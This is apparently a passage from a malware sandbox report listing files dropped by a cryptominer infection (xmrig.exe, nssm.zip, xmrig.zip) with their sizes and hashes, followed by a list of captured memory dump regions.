1136efb1a46d1f2d508162387f30dc4d

SHA1
f280858dcfefabc1a9a006a57f6b266a5d1fde8e

SHA256
eee9c44c29c2be011f1f1e43bb8c3fca888cb81053022ec5a0060035de16d848

SHA512
43b31f600196eaf05e1a40d7a6e14d4c48fc6e55aca32c641086f31d6272d4afb294a1d214e071d5a8cce683a4a88b66a6914d969b40cec55ad88fde4077d3f5

Download Submit
C:\Users\Admin\moneroocean\xmrig.exe

Filesize
9.0MB

MD5
9ee2c39700819e5daab85785cac24ae1

SHA1
9b5156697983b2bdbc4fff0607fadbfda30c9b3b

SHA256
e7c13a06672837a2ae40c21b4a1c8080d019d958c4a3d44507283189f91842e3

SHA512
47d81ff829970c903f15a791b2c31cb0c6f9ed45fdb1f329c786ee21b0d1d6cd2099edb9f930824caceffcc936e222503a0e2c7c6253718a65a5239c6c88b649

Download Submit
C:\Users\Admin\nssm.zip

Filesize
135KB

MD5
7ad31e7d91cc3e805dbc8f0615f713c1

SHA1
9f3801749a0a68ca733f5250a994dea23271d5c3

SHA256
5b12c3838e47f7bc6e5388408a1701eb12c4bbfcd9c19efd418781304590d201

SHA512
d7d947bfa40d6426d8bc4fb30db7b0b4209284af06d6db942e808cc959997cf23523ffef6c44b640f3d8dbe8386ebdc041d0ecb5b74e65af2c2d423df5396260

Download Submit
C:\Users\Admin\xmrig.zip

Filesize
3.5MB

MD5
640be21102a295874403dc35b85d09eb

SHA1
e8f02b3b8c0afcdd435a7595ad21889e8a1ab0e4

SHA256
ed33e294d53a50a1778ddb7dca83032e9462127fce6344de2e5d6be1cd01e64b

SHA512
ece0dfe12624d5892b94d0da437848d71b16f7c57c427f0b6c6baf757b9744f9e3959f1f80889ffefcb67a755d8bd7a7a63328a29ac9c657ba04bbdca3fea83e

Download Submit
memory/1420-12-0x00007FF945620000-0x00007FF9460E1000-memory.dmp

Filesize
10.8MB

Download
memory/1420-17-0x00007FF945620000-0x00007FF9460E1000-memory.dmp

Filesize
10.8MB

Download
memory/1420-11-0x00007FF945620000-0x00007FF9460E1000-memory.dmp

Filesize
10.8MB

Download
memory/1420-0-0x00007FF945623000-0x00007FF945625000-memory.dmp

Filesize
8KB

Download
memory/1420-1-0x00000247E0310000-0x00000247E0332000-memory.dmp

Filesize
136KB

Download
memory/1552-215-0x00007FF944F00000-0x00007FF9459C1000-memory.dmp

Filesize
10.8MB

Download
memory/1552-19-0x00007FF944F00000-0x00007FF9459C1000-memory.dmp

Filesize
10.8MB

Download
memory/2036-81-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/2036-80-0x00000000001E0000-0x0000000000200000-memory.dmp

Filesize
128KB

Download
memory/3024-55-0x000001B0D1080000-0x000001B0D1092000-memory.dmp

Filesize
72KB

Download
memory/3024-54-0x000001B0D0D30000-0x000001B0D0D3A000-memory.dmp

Filesize
40KB

Download
memory/4064-219-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-217-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-218-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-216-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-220-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-221-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-222-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-223-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-224-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-225-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-226-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-227-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download
memory/4064-228-0x0000000000400000-0x000000000102B000-memory.dmp

Filesize
12.2MB

Download